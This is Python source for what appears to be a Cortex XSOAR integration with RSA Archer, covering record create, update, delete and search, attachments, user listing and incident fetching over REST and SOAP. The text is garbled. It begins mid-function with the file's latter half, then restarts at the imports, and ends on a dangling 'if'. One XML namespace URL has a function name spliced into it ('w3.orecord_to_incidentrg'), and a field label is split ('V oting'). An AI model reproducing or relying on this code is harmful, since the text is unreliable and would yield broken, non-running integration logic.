client.get_level_by_app_id(app_id)[0] except IndexError as exc: raise DemistoException( 'Got no level by app id. You might be using the wrong application id' ) from exc field_contents = generate_field_contents(client, fields_values, level_data['mapping']) body = {'Content': {'LevelId': level_data['level'], 'FieldContents': field_contents}} res = client.do_request('Post', '/api/core/content', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): rec_id = res['RequestedObject']['Id'] return_outputs(f'Record created successfully, record id: {rec_id}', {'Archer.Record.Id': rec_id}, res) def delete_record_command(client: Client, args: Dict[str, str]): record_id = args.get('contentId') res = client.do_request('Delete', f'/api/core/content/{record_id}') errors = get_errors_from_res(res) if errors: return_error(errors) return_outputs(f'Record {record_id} deleted successfully', {}, res) def update_record_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') record_id = args.get('contentId') fields_values = args.get('fieldsToValues') level_data = client.get_level_by_app_id(app_id)[0] field_contents = generate_field_contents(client, fields_values, level_data['mapping']) body = {'Content': {'Id': record_id, 'LevelId': level_data['level'], 'FieldContents': field_contents}} res = client.do_request('Put', '/api/core/content', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('IsSuccessful'): return_outputs(f'Record {record_id} updated successfully', {}, res) else: raise DemistoException('Update record failed') def execute_statistics_command(client: Client, args: Dict[str, str]): report_guid = args.get('reportGuid') max_results = args.get('maxResults') res, raw_res = client.do_soap_request('archer-execute-statistic-search-by-report', report_guid=report_guid, max_results=max_results) if res: res = json.loads(xml2json(res)) return_outputs(res, {}, {}) def get_reports_command(client: Client, args: Dict[str, str]): res, raw_res = client.do_soap_request('archer-get-reports') res = json.loads(xml2json(res)) ec = res.get('ReportValues').get('ReportValue') context: dict = { 'Archer.Report(val.ReportGUID && val.ReportGUID == obj.ReportGUID)': ec } return_outputs(ec, context, {}) def search_options_command(client: Client, args: Dict[str, str]): report_guid = args.get('reportGuid') res, raw_res = client.do_soap_request('archer-get-search-options-by-guid', report_guid=report_guid) if res.startswith('<'): res = json.loads(xml2json(res)) return_outputs(res, {}, {}) def reset_cache_command(client: Client, args: Dict[str, str]): demisto.setIntegrationContext({}) return_outputs('', {}, '') def get_value_list_command(client: Client, args: Dict[str, str]): field_id = args.get('fieldID') field_data = client.get_field_value_list(field_id) markdown = tableToMarkdown(f'Value list for field {field_id}', field_data['ValuesList']) context: dict = { 'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': field_data } return_outputs(markdown, context, {}) def upload_file_command(client: Client, args: Dict[str, str]) -> str: """Uploading a file to archer as an attachment Arguments: client: A client to use in order to send the api callarcher-get-file args: demisto args Returns: An attachment id from Archer """ entry_id = args.get('entryId') file_name, file_bytes = get_file(entry_id) body = {'AttachmentName': file_name, 'AttachmentBytes': file_bytes} res = client.do_request('POST', '/api/core/content/attachment', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): attachment_id = res['RequestedObject'].get('Id') else: raise DemistoException('Upload file failed') return_outputs(f'File uploaded successfully, attachment ID: {attachment_id}', {}, res) return attachment_id def upload_and_associate_command(client: Client, args: Dict[str, str]): """Uploading an entry to archer. than, if needed, associate it to a record. """ app_id = args.get('applicationId') content_id = args.get('contentId') associate_field = args.get('associatedField') should_associate_to_record = app_id and content_id if not should_associate_to_record: # If both app_id and content_id if app_id or content_id: # If one of them, raise error. User's mistake raise DemistoException( 'Found arguments to associate an attachment to a record, but not all required arguments supplied' ) attachment_id = upload_file_command(client, args) if should_associate_to_record: args['fieldsToValues'] = json.dumps({associate_field: [attachment_id]}) update_record_command(client, args) def download_file_command(client: Client, args: Dict[str, str]): attachment_id = args.get('fileId') res = client.do_request('GET', f'/api/core/content/attachment/{attachment_id}') errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): content = base64.b64decode(res['RequestedObject'].get('AttachmentBytes')) filename = res['RequestedObject'].get('AttachmentName') return demisto.results(fileResult(filename, content)) else: return_error('File downloading failed', outputs=res) def list_users_command(client: Client, args: Dict[str, str]): user_id = args.get('userId') if user_id: res = client.do_request('GET', f'/api/core/system/user/{user_id}') else: res = client.do_request('GET', '/api/core/system/user') errors = get_errors_from_res(res) if errors: return_error(errors) if isinstance(res, dict): res = [res] users = [] for user in res: if user.get('RequestedObject') and user.get('IsSuccessful'): user_obj = user['RequestedObject'] users.append({'Id': user_obj.get('Id'), 'DisplayName': user_obj.get('DisplayName'), 'FirstName': user_obj.get('FirstName'), 'MiddleName': user_obj.get('MiddleName'), 'LastName': user_obj.get('LastName'), 'AccountStatus': ACCOUNT_STATUS_DICT[user_obj.get('AccountStatus')], 'LastLoginDate': user_obj.get('LastLoginDate'), 'UserName': user_obj.get('UserName')}) markdown = tableToMarkdown('Users list', users) context: dict = { 'Archer.User(val.Id && val.Id == obj.Id)': users } return_outputs(markdown, context, res) def search_records_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') field_to_search = args.get('fieldToSearchOn') search_value = args.get('searchValue') max_results = args.get('maxResults', 10) date_operator = args.get('dateOperator') numeric_operator = args.get('numeric-operator') fields_to_display = argToList(args.get('fieldsToDisplay')) fields_to_get = argToList(args.get('fieldsToGet')) full_data = args.get('fullData', 'true') == 'true' if fields_to_get and 'Id' not in fields_to_get: fields_to_get.append('Id') if not all(f in fields_to_get for f in fields_to_display): return_error('fields-to-display param should have only values from fields-to-get') if full_data: level_data = client.get_level_by_app_id(app_id)[0] fields_mapping = level_data['mapping'] fields_to_get = [fields_mapping[next(iter(fields_mapping))]['Name']] records, raw_res = client.search_records( app_id, fields_to_get, field_to_search, search_value, numeric_operator, date_operator, max_results=max_results ) records = list(map(lambda x: x['record'], records)) if full_data: records_full = [] for rec in records: record_item, _, errors = client.get_record(app_id, rec['Id']) if not errors: records_full.append(record_item) records = records_full hr = [] if full_data: hr = records else: for record in records: hr.append({f: record[f] for f in fields_to_display}) markdown = tableToMarkdown('Search records results', hr) context: dict = {'Archer.Record(val.Id && val.Id == obj.Id)': records} return_outputs(markdown, context, {}) def search_records_by_report_command(client: Client, args: Dict[str, str]): report_guid = args.get('reportGuid') res, raw_res = client.do_soap_request('archer-search-records-by-report', report_guid=report_guid) if not res: return_outputs(f'No records found for report {report_guid}', {}, json.loads(xml2json(raw_res))) return raw_records = json.loads(xml2json(res)) records = [] ec = {} if raw_records.get('Records') and raw_records['Records'].get('Record'): level_id = raw_records['Records']['Record'][0]['@levelId'] level_res = client.do_request('GET', f'/api/core/system/fielddefinition/level/{level_id}') fields = {} for field in level_res: if field.get('RequestedObject') and field.get('IsSuccessful'): field_item = field.get('RequestedObject') field_id = str(field_item.get('Id')) fields[field_id] = {'Type': field_item.get('Type'), 'Name': field_item.get('Name')} records = client.xml_to_records(res, fields) records = list(map(lambda x: x['record'], records)) ec = {'Record': records, 'RecordsAmount': len(records), 'ReportGUID': report_guid} markdown = tableToMarkdown('Search records by report results', records) context: dict = {'Archer.SearchByReport(val.ReportGUID && val.ReportGUID == obj.ReportGUID)': ec} return_outputs(markdown, context, json.loads(xml2json(raw_res))) def print_cache_command(client: Client, args: Dict[str, str]): cache = demisto.getIntegrationContext() return_outputs(cache, {}, {}) def fetch_incidents( client: Client, params: dict, from_time: str ) -> Tuple[list, str]: """Fetches incidents. Args: client: Client derived from BaseClient params: demisto.params dict. from_time: Time to start the fetch from Returns: next_run object, incidents """ # Not using get method as those params are a must app_id = params['applicationId'] date_field = params['applicationDateField'] max_results = params.get('fetch_limit', 10) offset = int(params.get('time_zone', '0')) fields_to_display = argToList(params.get('fields_to_fetch')) fields_to_display.append(date_field) day_first = argToBoolean(params.get('useEuropeanTime', False)) from_time_utc_obj = parser(from_time).replace(tzinfo=timezone.utc) from_time_utc = format_time(from_time_utc_obj, day_first) # API Call records, raw_res = client.search_records( app_id, fields_to_display, date_field, from_time_utc, date_operator='GreaterThan', max_results=max_results ) # Build incidents incidents = list() next_fetch = from_time_utc_obj for record in records: incident, incident_created_time = client.record_to_incident( record, app_id, date_field, day_first=day_first, offset=offset ) if incident_created_time > next_fetch: next_fetch = incident_created_time incidents.append(incident) return incidents, next_fetch.strftime(OCCURRED_FORMAT) def get_fetch_time(last_fetch: dict, first_fetch_time: str, offset: int = 0) -> str: """Gets lastRun object and first fetch time (str, 3 days) and returns a datetime object of the last run if exists, else datetime of the first fetch time Args: last_fetch: a dict that may contain 'last_fetch' first_fetch_time: time back in simple format (3 days) offset: time difference between CortexXSOAR machine and Archer, in minutes. Returns: Time to start fetch from """ if next_run := last_fetch.get('last_fetch'): start_fetch = parser(next_run) else: start_fetch, _ = parse_date_range(first_fetch_time) if offset: start_fetch = start_fetch - timedelta(minutes=offset) start_fetch = start_fetch.replace(tzinfo=None) return start_fetch.strftime(OCCURRED_FORMAT) def main(): params = demisto.params() credentials = params.get('credentials') base_url = params.get('url').strip('/') cache = demisto.getIntegrationContext() if not cache.get('fieldValueList'): cache['fieldValueList'] = {} demisto.setIntegrationContext(cache) client = Client( base_url, credentials.get('identifier'), credentials.get('password'), params.get('instanceName'), params.get('userDomain'), verify=not params.get('insecure', False), proxy=params.get('proxy', False) ) commands = { 'archer-search-applications': search_applications_command, 'archer-get-application-fields': get_application_fields_command, 'archer-get-field': get_field_command, 'archer-get-mapping-by-level': get_mapping_by_level_command, 'archer-get-record': get_record_command, 'archer-create-record': create_record_command, 'archer-delete-record': delete_record_command, 'archer-update-record': update_record_command, 'archer-execute-statistic-search-by-report': execute_statistics_command, 'archer-get-reports': get_reports_command, 'archer-get-search-options-by-guid': search_options_command, 'archer-reset-cache': reset_cache_command, 'archer-get-valuelist': get_value_list_command, 'archer-upload-file': upload_and_associate_command, 'archer-get-file': download_file_command, 'archer-list-users': list_users_command, 'archer-search-records': search_records_command, 'archer-search-records-by-report': search_records_by_report_command, 'archer-print-cache': print_cache_command, } command = demisto.command() LOG(f'Command being called is {command}') try: if command == 'fetch-incidents': offset = int(params['time_zone']) from_time = get_fetch_time( demisto.getLastRun(), params.get('fetch_time', '3 days'), offset ) incidents, next_fetch = fetch_incidents( client=client, params=params, from_time=from_time ) demisto.debug(f'Setting next run to {next_fetch}') demisto.setLastRun({'last_fetch': next_fetch}) demisto.incidents(incidents) elif command == 'test-module': demisto.results(test_module(client, params)) elif command in commands: return commands[command](client, demisto.args()) else: return_error('Command not found.') except Exception as e: return_error(f'Unexpected error: {str(e)}, traceback: {traceback.format_exc()}') if __name__ in ('__builtin__', 'builtins'): main()
from datetime import timezone from typing import Dict, Tuple import dateparser import urllib3 from CommonServerPython import * ''' IMPORTS ''' # Disable insecure warnings urllib3.disable_warnings() OCCURRED_FORMAT = '%Y-%m-%dT%H:%M:%SZ' REQUEST_HEADERS = { 'Accept': 'application/json,text/html,application/xhtml +xml,application/xml;q=0.9,*/*;q=0.8', 'Content-Type': 'application/json' } FIELD_TYPE_DICT = { 1: 'Text', 2: 'Numeric', 3: 'Date', 4: 'Values List', 6: 'TrackingID', 7: 'External Links', 8: 'Users/Groups List', 9: 'Cross-Reference', 11: 'Attachment', 12: 'Image', 14: 'Cross-Application Status Tracking (CAST)', 16: 'Matrix', 19: 'IP Address', 20: 'Record Status', 21: 'First Published', 22: 'Last Updated Field', 23: 'Related Records', 24: 'Sub-Form', 25: 'History Log', 26: 'Discussion', 27: 'Multiple Reference Display Control', 28: 'Questionnaire Reference', 29: 'Access History', 30: 'V oting', 31: 'Scheduler', 1001: 'Cross-Application Status Tracking Field Value' } ACCOUNT_STATUS_DICT = {1: 'Active', 2: 'Inactive', 3: 'Locked'} def format_time(datetime_object: datetime, use_european_time: bool) -> str: """Transform datetime to string, handles european time. Arguments: datetime_object: object to transform use_european_time: Whatever the day position should be first or second Returns: A string formatted: 7/22/2017 3:58 PM (American) or 22/7/2017 3:58 PM (European) """ time_format = '%d/%m/%Y %I:%M %p' if use_european_time else '%m/%d/%Y %I:%M %p' return datetime_object.strftime(time_format) def parse_date_to_datetime(date: str, day_first: bool = False) -> datetime: """Return a datetime object from given date. Format of "1/1/2020 04:00 PM". Arguments: date: a date string day_first: is the day first in the string (European) Returns: a datetime object """ date_order = {'DATE_ORDER': 'DMY' if day_first else 'MDY'} date_obj = parser(date, settings=date_order) return date_obj def parser(date_str, date_formats=None, languages=None, locales=None, region=None, settings=None) -> datetime: """Wrapper of dateparser.parse to support return type value """ date_obj = dateparser.parse( date_str, date_formats=date_formats, languages=languages, locales=locales, region=region, settings=settings ) assert isinstance(date_obj, datetime), f'Could not parse date {date_str}' # MYPY Fix return date_obj def get_token_soap_request(user, password, instance): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.orecord_to_incidentrg/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <CreateUserSessionFromInstance xmlns="http://archer-tech.com/webservices/">' + \ f' <userName>{user}</userName>' + \ f' <instanceName>{instance}</instanceName>' + \ f' <password>{password}</password>' + \ ' </CreateUserSessionFromInstance>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def terminate_session_soap_request(token): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \ ' xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <TerminateSession xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ ' </TerminateSession>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def get_reports_soap_request(token): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <GetReports xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ ' </GetReports>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def get_statistic_search_report_soap_request(token, report_guid, max_results): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \ ' xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <ExecuteStatisticSearchByReport xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ f' <reportIdOrGuid>{report_guid}</reportIdOrGuid>' + \ f' <pageNumber>{max_results}</pageNumber>' + \ ' </ExecuteStatisticSearchByReport>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def get_search_options_soap_request(token, report_guid): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <GetSearchOptionsByGuid xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ f' <searchReportGuid>{report_guid}</searchReportGuid>' + \ ' </GetSearchOptionsByGuid>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def search_records_by_report_soap_request(token, report_guid): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <SearchRecordsByReport xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ f' <reportIdOrGuid>{report_guid}</reportIdOrGuid>' + \ ' <pageNumber>1</pageNumber>' + \ ' </SearchRecordsByReport>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def search_records_soap_request( token, app_id, display_fields, field_id, field_name, search_value, date_operator='', numeric_operator='', max_results=10 ): request_body = '<?xml version="1.0" encoding="UTF-8"?>' + \ '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema"' \ ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' + \ ' <soap:Body>' + \ ' <ExecuteSearch xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ ' <searchOptions>' + \ ' <![CDATA[<SearchReport>' + \ ' <PageSize>100</PageSize>' + \ ' <PageNumber>1</PageNumber>' + \ f' <MaxRecordCount>{max_results}</MaxRecordCount>' + \ ' <ShowStatSummaries>false</ShowStatSummaries>' + \ f' <DisplayFields>{display_fields}</DisplayFields>' + \ f' <Criteria><ModuleCriteria><Module name="appname">{app_id}</Module></ModuleCriteria>' if search_value: request_body += '<Filter><Conditions>' if date_operator: request_body += '<DateComparisonFilterCondition>' + \ f' <Operator>{date_operator}</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ ' <TimeZoneId>UTC Standard Time</TimeZoneId>' + \ ' <IsTimeIncluded>TRUE</IsTimeIncluded>' + \ '</DateComparisonFilterCondition >' elif numeric_operator: request_body += '<NumericFilterCondition>' + \ f' <Operator>{numeric_operator}</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ '</NumericFilterCondition >' else: request_body += '<TextFilterCondition>' + \ ' <Operator>Contains</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ '</TextFilterCondition >' request_body += '</Conditions></Filter>' if date_operator: # Fetch incidents must present date_operator request_body += '<Filter>' + \ '<Conditions>' + \ ' <DateComparisonFilterCondition>' + \ f' <Operator>{date_operator}</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ ' <TimeZoneId>UTC Standard Time</TimeZoneId>' + \ ' <IsTimeIncluded>TRUE</IsTimeIncluded>' + \ ' </DateComparisonFilterCondition >' + \ '</Conditions>' + \ '</Filter>' request_body += ' </Criteria></SearchReport>]]>' + \ '</searchOptions>' + \ '<pageNumber>1</pageNumber>' + \ '</ExecuteSearch>' + \ '</soap:Body>' + \ '</soap:Envelope>' return request_body SOAP_COMMANDS = { 'archer-get-reports': {'soapAction': 'http://archer-tech.com/webservices/GetReports', 'urlSuffix': 'ws/search.asmx', 'soapBody': get_reports_soap_request, 'outputPath': 'Envelope.Body.GetReportsResponse.GetReportsResult'}, 'archer-execute-statistic-search-by-report': { 'soapAction': 'http://archer-tech.com/webservices/ExecuteStatisticSearchByReport', 'urlSuffix': 'ws/search.asmx', 'soapBody': get_statistic_search_report_soap_request, 'outputPath': 'Envelope.Body.ExecuteStatisticSearchByReportResponse.ExecuteStatistic' 'SearchByReportResult' }, 'archer-get-search-options-by-guid': {'soapAction': 'http://archer-tech.com/webservices/GetSearchOptionsByGuid', 'urlSuffix': 'ws/search.asmx', 'soapBody': get_search_options_soap_request, 'outputPath': 'Envelope.Body.GetSearchOptionsByGuidResponse.GetSearchOptionsByGuidResult' }, 'archer-search-records': {'soapAction': 'http://archer-tech.com/webservices/ExecuteSearch', 'urlSuffix': 'ws/search.asmx', 'soapBody': search_records_soap_request, 'outputPath': 'Envelope.Body.ExecuteSearchResponse.ExecuteSearchResult'}, 'archer-search-records-by-report': { 'soapAction': 'http://archer-tech.com/webservices/SearchRecordsByReport', 'urlSuffix': 'ws/search.asmx', 'soapBody': search_records_by_report_soap_request, 'outputPath': 'Envelope.Body.SearchRecordsByReportResponse.SearchRecordsByReportResult' } } class Client(BaseClient): def __init__(self, base_url, username, password, instance_name, domain, **kwargs): self.username = username self.password = password self.instance_name = instance_name self.domain = domain super(Client, self).__init__(base_url=base_url, headers=REQUEST_HEADERS, **kwargs) def do_request(self, method, url_suffix, data=None, params=None): if not REQUEST_HEADERS.get('Authorization'): self.update_session() res = self._http_request(method, url_suffix, headers=REQUEST_HEADERS, json_data=data, params=params, resp_type='response', ok_codes=(200, 401)) if res.status_code == 401: self.update_session() res = self._http_request(method, url_suffix, headers=REQUEST_HEADERS, json_data=data, resp_type='response', ok_codes=(200, 401)) return res.json() def update_session(self): body = { 'InstanceName': self.instance_name, 'Username': self.username, 'UserDomain': self.domain, 'Password': self.password } res = self._http_request('POST', '/api/core/security/login', json_data=body) is_successful_response = res.get('IsSuccessful') if not is_successful_response: return_error(res.get('ValidationMessages')) session = res.get('RequestedObject', {}).get('SessionToken') REQUEST_HEADERS['Authorization'] = f'Archer session-id={session}' def get_token(self): body = get_token_soap_request(self.username, self.password, self.instance_name) headers = {'SOAPAction': 'http://archer-tech.com/webservices/CreateUserSessionFromInstance', 'Content-Type': 'text/xml; charset=utf-8'} res = self._http_request('POST' '', 'ws/general.asmx', headers=headers, data=body, resp_type='content') return extract_from_xml(res, 'Envelope.Body.CreateUserSessionFromInstanceResponse.' 'CreateUserSessionFromInstanceResult') def destroy_token(self, token): body = terminate_session_soap_request(token) headers = {'SOAPAction': 'http://archer-tech.com/webservices/TerminateSession', 'Content-Type': 'text/xml; charset=utf-8'} self._http_request('POST', 'ws/general.asmx', headers=headers, data=body, resp_type='content') def do_soap_request(self, command, **kwargs): req_data = SOAP_COMMANDS[command] headers = {'SOAPAction': req_data['soapAction'], 'Content-Type': 'text/xml; charset=utf-8'} token = self.get_token() body = req_data['soapBody'](token, **kwargs) # type: ignore res = self._http_request('POST', req_data['urlSuffix'], headers=headers, data=body, resp_type='content') self.destroy_token(token) return extract_from_xml(res, req_data['outputPath']), res def get_level_by_app_id(self, app_id): cache = demisto.getIntegrationContext() if cache.get(app_id): return cache[app_id] levels = [] all_levels_res = self.do_request('GET', f'/api/core/system/level/module/{app_id}') for level in all_levels_res: if level.get('RequestedObject') and level.get('IsSuccessful'): level_id = level.get('RequestedObject').get('Id') fields = {} level_res = self.do_request('GET', f'/api/core/system/fielddefinition/level/{level_id}') for field in level_res: if field.get('RequestedObject') and field.get('IsSuccessful'): field_item = field.get('RequestedObject') field_id = str(field_item.get('Id')) fields[field_id] = {'Type': field_item.get('Type'), 'Name': field_item.get('Name'), 'FieldId': field_id, 'IsRequired': field_item.get('IsRequired', False), 'RelatedValuesListId': field_item.get('RelatedValuesListId')} levels.append({'level': level_id, 'mapping': fields}) if levels: cache[int(app_id)] = levels demisto.setIntegrationContext(cache) return levels return [] def get_record(self, app_id, record_id): res = self.do_request('GET', f'/api/core/content/{record_id}') if not isinstance(res, dict): res = res.json() errors = get_errors_from_res(res) record = {} if res.get('RequestedObject') and res.get('IsSuccessful'): content_obj = res.get('RequestedObject') level_id = content_obj.get('LevelId') levels = self.get_level_by_app_id(app_id) level_fields = list(filter(lambda m: m['level'] == level_id, levels)) if level_fields: level_fields = level_fields[0]['mapping'] else: return {}, res, errors for _id, field in content_obj.get('FieldContents').items(): field_data = level_fields.get(str(_id)) # type: ignore field_type = field_data.get('Type') # when field type is IP Address if field_type == 19: field_value = field.get('IpAddressBytes') # when field type is Values List elif field_type == 4 and field.get('Value') and field['Value'].get('ValuesListIds'): list_data = self.get_field_value_list(_id) list_ids = field['Value']['ValuesListIds'] list_ids = list(filter(lambda x: x['Id'] in list_ids, list_data['ValuesList'])) field_value = list(map(lambda x: x['Name'], list_ids)) else: field_value = field.get('Value') if field_value: record[field_data.get('Name')] = field_value record['Id'] = content_obj.get('Id') return record, res, errors def record_to_incident( self, record_item, app_id, date_field, day_first: bool = False, offset: int = 0 ) -> Tuple[dict, datetime]: labels = [] raw_record = record_item['raw'] record_item = record_item['record'] incident_created_time = datetime(1, 1, 1) if record_item.get(date_field): incident_created_time = parse_date_to_datetime( record_item[date_field], day_first=day_first ).replace(tzinfo=None) # fix occurred by offset incident_created_time = incident_created_time + timedelta(minutes=offset) # Will convert value to strs for k, v in record_item.items(): if isinstance(v, str): labels.append({ 'type': k, 'value': v }) else: labels.append({ 'type': k, 'value': json.dumps(v) }) labels.append({'type': 'ModuleId', 'value': app_id}) labels.append({'type': 'ContentId', 'value': record_item.get("Id")}) labels.append({'type': 'rawJSON', 'value': json.dumps(raw_record)}) incident = { 'name': f'RSA Archer Incident: {record_item.get("Id")}', 'details': json.dumps(record_item), 'occurred': incident_created_time.strftime(OCCURRED_FORMAT), 'labels': labels, 'rawJSON': json.dumps(raw_record) } demisto.debug(f'Going out with a new incident. occurred={incident["occurred"]}') return incident, incident_created_time def search_records( self, app_id, fields_to_display=None, field_to_search='', search_value='', numeric_operator='', date_operator='', max_results=10, ): demisto.debug(f'searching for records {field_to_search}:{search_value}') if fields_to_display is None: fields_to_display = [] try: level_data = self.get_level_by_app_id(app_id)[0] except IndexError as exc: raise DemistoException( 'Could not find a level data. You might be using the wrong application id' ) from exc # Building request fields fields_xml = '' search_field_name = '' search_field_id = '' fields_mapping = level_data['mapping'] for field in fields_mapping.keys(): field_name = fields_mapping[field]['Name'] if field_name in fields_to_display: fields_xml += f'<DisplayField name="{field_name}">{field}</DisplayField>' if field_name == field_to_search: search_field_name = field_name search_field_id = field res, raw_res = self.do_soap_request( 'archer-search-records', app_id=app_id, display_fields=fields_xml, field_id=search_field_id, field_name=search_field_name, numeric_operator=numeric_operator, date_operator=date_operator, search_value=search_value, max_results=max_results ) if not res: return [], raw_res records = self.xml_to_records(res, fields_mapping) return records, raw_res def xml_to_records(self, xml_response, fields_mapping): res = json.loads(xml2json(xml_response)) records = [] if res.get('Records') and res['Records'].get('Record'): records_data = res['Records']['Record'] if isinstance(records_data, dict): records_data = [records_data] for item in records_data: record = {'Id': item.get('@contentId')} record_fields = item.get('Field') if isinstance(record_fields, dict): record_fields = [record_fields] for field in record_fields: field_name = fields_mapping[field.get('@id')]['Name'] field_type = field.get('@type') field_value = '' if field_type == '3': field_value = field.get('@xmlConvertedValue') elif field_type == '4': if field.get('ListValues'): field_value = field['ListValues']['ListValue']['@displayName'] elif field_type == '8': field_value = json.dumps(field) else: field_value = field.get('#text') record[field_name] = field_value records.append({'record': record, 'raw': item}) return records def get_field_value_list(self, field_id): cache = demisto.getIntegrationContext() if cache['fieldValueList'].get(field_id): return cache.get('fieldValueList').get(field_id) res = self.do_request('GET', f'/api/core/system/fielddefinition/{field_id}') errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): list_id = res['RequestedObject']['RelatedValuesListId'] values_list_res = self.do_request('GET', f'/api/core/system/valueslistvalue/valueslist/{list_id}') if values_list_res.get('RequestedObject') and values_list_res.get('IsSuccessful'): values_list = [] for value in values_list_res['RequestedObject'].get('Children'): values_list.append({'Id': value['Data']['Id'], 'Name': value['Data']['Name'], 'IsSelectable': value['Data']['IsSelectable']}) field_data = {'FieldId': field_id, 'ValuesList': values_list} cache['fieldValueList'][field_id] = field_data demisto.setIntegrationContext(cache) return field_data return {} def extract_from_xml(xml, path): xml = json.loads(xml2json(xml)) path = path.split('.') for item in path: if xml.get(item): xml = xml[item] continue return '' return xml def generate_field_contents(client, fields_values, level_fields): if fields_values and not isinstance(fields_values, dict): try: fields_values = json.loads(fields_values) except Exception: raise Exception('Failed to parese fields-values argument') field_content = {} for field_name in fields_values.keys(): field_data = None for _id, field in level_fields.items(): if field.get('Name') == field_name: field_data = field break if field_data: field_key, field_value = generate_field_value(client, field_name, field_data, fields_values[field_name]) field_content[_id] = {'Type': field_data['Type'], field_key: field_value, 'FieldId': _id} return field_content def generate_field_value(client, field_name, field_data, field_val): field_type = field_data['Type'] # when field type is Values List, call get_field_value_list method to get the value ID # for example: {"Type":["Switch"], fieldname:[value1, value2]} if field_type == 4: field_data = client.get_field_value_list(field_data['FieldId']) list_ids = [] if not isinstance(field_val, list): field_val = [field_val] for item in field_val: tmp_id = next(f for f in field_data['ValuesList'] if f['Name'] == item) if tmp_id: list_ids.append(tmp_id['Id']) else: raise Exception(f'Failed to create field {field_name} with the value {field_data}') return 'Value', {'ValuesListIds': list_ids} # when field type is External Links # for example: {"Patch URL":[{"value":"github", "link": "https://github.com"}]} elif field_type == 7: list_urls = [] for item in field_val: list_urls.append({'Name': item.get('value'), 'URL': item.get('link')}) return 'Value', list_urls # when field type is Users/Groups List # for example: {"Policy Owner":{"users":[20],"groups":[30]}} elif field_type == 8: users = field_val.get('users') groups = field_val.get('groups') field_val = {'UserList': [], 'GroupList': []} if users: for user in users: field_val['UserList'].append({'ID': user}) if groups: for group in groups: field_val['GroupList'].append({'ID': group}) return 'Value', field_val # when field type is Cross- Reference # for example: {"Area Reference(s)":[20]} elif field_type == 9: list_cross_reference = [] if isinstance(field_val, list): for content in field_val: list_cross_reference.append({'ContentID': content}) else: list_cross_reference = [{'ContentID': field_val}] return 'Value', list_cross_reference elif field_type == 19: return 'IpAddressBytes', field_val else: return 'Value', field_val def get_errors_from_res(res): if isinstance(res, dict) and res.get('ValidationMessages'): messages = [] for message in res.get('ValidationMessages'): # type: ignore messages.append(message.get('ResourcedMessage')) return '\n'.join(messages) def get_file(entry_id): get_file_path_res = demisto.getFilePath(entry_id) file_path = get_file_path_res["path"] file_name = get_file_path_res["name"] with open(file_path, 'rb') as fopen: file_bytes = fopen.read() file_bytes = base64.b64encode(file_bytes) return file_name, file_bytes.decode('utf-8') def test_module(client: Client, params: dict) -> str: if params.get('isFetch', False): offset_in_minutes = int(params['time_zone']) last_fetch = get_fetch_time( {}, params.get('fetch_time', '3 days'), offset_in_minutes ) fetch_incidents(client, params, last_fetch) return 'ok' return 'ok' if 